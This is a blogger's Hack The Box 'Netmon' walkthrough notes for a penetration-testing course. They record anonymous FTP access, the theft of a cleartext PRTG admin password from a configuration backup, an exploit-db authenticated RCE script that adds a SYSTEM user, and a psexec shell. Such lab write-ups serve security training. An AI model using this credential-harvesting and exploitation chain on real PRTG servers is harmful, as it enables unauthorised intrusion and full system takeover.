TCM PEH Hacking Netmon Notes

on March 26, 2021 under certs

2 minute read

HTB Netmon

Recording actions to derive method.

nmap -T4 -A -p- 10.10.10.152
Noted open port 21 ftp
Noted ftp allows anonymous login
Noted ftp is basically entire Windows C:
Noted open port 80 http
Noted port 80 PRTG Network Monitor 18.1.37
Noted Windows Server 2008 R2 OS

Visited http://10.10.10.152:80
Noted PRTG Network Monitor
Googled PRTG Network Monitor default credentials
Found PRTG knowledgebase results prtgadmin:prtgadmin
Tested creds, failed
Googled prtg network monitor exploits
Found exploit-db RCE (Authenticated)
FTP is sharing out C:
Googled prtg network monitor db file location
Found prtg knowledgebase results with several locations

ftp 10.10.10.152
anonymous
Enter
ls
cd Users
ls
ls -la
Noted hidden directories
cd “All Users”
ls -la
cd “Application Data”
Noted Access Denied
cd “Application Data\Paessler\PRTG Network Monitor”
Noted this was successful!!!
ls
Noted PRTG Configuration files
get “PRTG Configuration.dat”
get “PRTG Configuration.old”
get “PRTG Configuration.old.bak”
bye

ls | grep PRTG
Noted all 3 files are here
cat PRTG\ Configuration.dat | grep prtgadmin
Noted the default cred is here
gedit PRTG\ Configuration.dat
ctrl+f
prtgadmin
Noted that password for prtgadmin is encrypted
Closed
gedit PRTG\ Configuration.old
ctrl+f
prtgadmin
Noted that password for prtgadmin is encrypted
Closed
gedit PRTG\ Configuration.old.bak
ctrl+f
prtgadmin
Noted password for prtgadmin are in clear text (ends in str 2018)
Copied password

Went back to 10.10.10.152:80
Tried password, failed
Tried password with 2018 replaced with 2019, success
Logged into PRTG Netmon Dashboard
Noted exploit-db RCE (Authenticated) requires a cookie
Opened burp
Started proxy and intercept
Copied exploit-db payload
gedit new.sh
Pasted exploit into it
Saved & Exit
chmod +x new.sh
./new.sh http://10.10.10.152 -c “<pasted cookie here>”
Exploit is running, trying to create new NT\System user pentest:P3nT3st on remote machine
Exploit completed

Installed impacket(https://github.com/SecureAuthCorp/impacket)
psexec.py pentest:“P3nT3st”@10.10.10.152
Spawned a shell!!
whoami
nt authority\system

certs, pwned

I feedback.
Let me know what you think of this article on twitter @cpardue09 or leave a comment below!